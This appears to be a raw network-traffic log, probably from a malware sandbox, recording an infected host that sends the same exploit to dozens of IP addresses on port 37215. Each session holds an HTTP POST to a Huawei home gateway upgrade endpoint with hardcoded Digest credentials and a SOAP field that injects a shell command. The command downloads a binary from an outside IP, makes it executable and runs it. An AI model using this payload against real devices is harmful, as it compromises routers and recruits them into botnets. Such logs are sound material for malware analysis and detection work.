                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2444192.168.2.153518641.197.184.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813055992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2445192.168.2.154047441.58.71.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813127995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2446192.168.2.153549041.157.249.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813152075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2447192.168.2.154271841.197.49.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813174963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2448192.168.2.155083641.105.254.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813204050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2449192.168.2.153885641.194.221.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813261986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2450192.168.2.154497841.11.162.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813293934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2451192.168.2.155838441.227.115.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813318014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2452192.168.2.153922041.83.188.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815152884 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2453192.168.2.154315841.242.48.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815191031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
